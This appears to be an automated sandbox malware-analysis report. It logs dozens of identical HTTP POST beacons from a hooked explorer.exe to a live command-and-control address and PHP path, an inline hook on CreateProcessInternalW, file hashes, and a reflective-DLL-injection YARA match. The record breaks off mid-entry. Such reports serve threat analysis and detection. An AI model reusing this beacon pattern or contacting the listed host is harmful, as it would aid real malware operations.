Date: Tue, 17 Dec 2024 17:16:17 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.8 | 49751 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:18.968734980 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:19.088586092 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:20.604249954 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 49753 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:20.874489069 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:20.994328022 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:22.480416059 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:21 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.8 | 49754 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:22.703037024 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:22.823024988 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:24.156538010 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 49755 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:24.390672922 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:24.510447025 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:25.998195887 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:25 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 49756 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:26.250619888 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:26.370508909 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:27.694597960 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:26 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 49757 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:27.921786070 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:28.041588068 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:29.536186934 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:28 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.8 | 49758 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:29.767126083 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:29.887168884 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:31.385351896 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:30 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.8 | 49759 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:31.610156059 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:31.731168985 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:33.230658054 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:32 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.8 | 49760 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:33.458137989 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:33.578124046 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:34.917346954 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:34 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.8 | 49761 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:35.164423943 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:35.293823957 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:36.760782003 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:35 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.8 | 49762 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:37.000183105 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:37.120145082 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:38.624383926 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:37 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.8 | 49763 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:38.859333992 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:38.979604006 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:40.303961992 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.8 | 49764 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:40.531418085 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:40.651293993 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:42.154747009 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:41 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.8 | 49765 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:42.440339088 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:42.560244083 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:44.060909033 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:43 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.8 | 49766 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:44.296618938 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:44.416454077 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:45.914441109 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:44 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.8 | 49767 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:46.140492916 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:46.260622978 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:47.587606907 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:46 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.8 | 49768 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:47.867187977 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:47.987076998 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:49.322870970 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:48 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.8 | 49769 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:49.546920061 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:49.667061090 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:51.006777048 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.8 | 49770 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:51.234385014 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:51.354208946 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:52.681742907 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:51 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.8 | 49771 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:52.922429085 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:53.042423964 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:54.355576992 CET | 216 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:53 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.8 | 49772 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:54.593786955 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:54.713641882 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:56.037787914 CET | 216 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:55 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.8 | 49773 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:56.266467094 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:56.386661053 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:57.877729893 CET | 216 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:56 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.8 | 49774 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:58.114125013 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:58.234004974 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:59.714562893 CET | 216 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:58 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.8 | 49775 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:59.937259912 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:17:00.057138920 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:17:01.412868977 CET | 216 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:17:00 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Code Manipulations

Function Name | Hook Type | Active in Processes
CreateProcessInternalW | INLINE | explorer.exe
Function Name | Hook Type | New Data
CreateProcessInternalW | INLINE | 0xE9 0x90 0x00 0x07 0x75 0x5D

                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\uFVgJVXaEU.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\uFVgJVXaEU.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff7e83c0000
                                                                                                                                                                                                                      File size:312'320 bytes
                                                                                                                                                                                                                      MD5 hash:BFAE2C479A12CBC660E580A84D3E3CE0
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6ec840000
                                                                                                                                                                                                                      File size:632'808 bytes
                                                                                                                                                                                                                      MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000003.00000002.2672467655.000001F00D07E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6345c0000
                                                                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
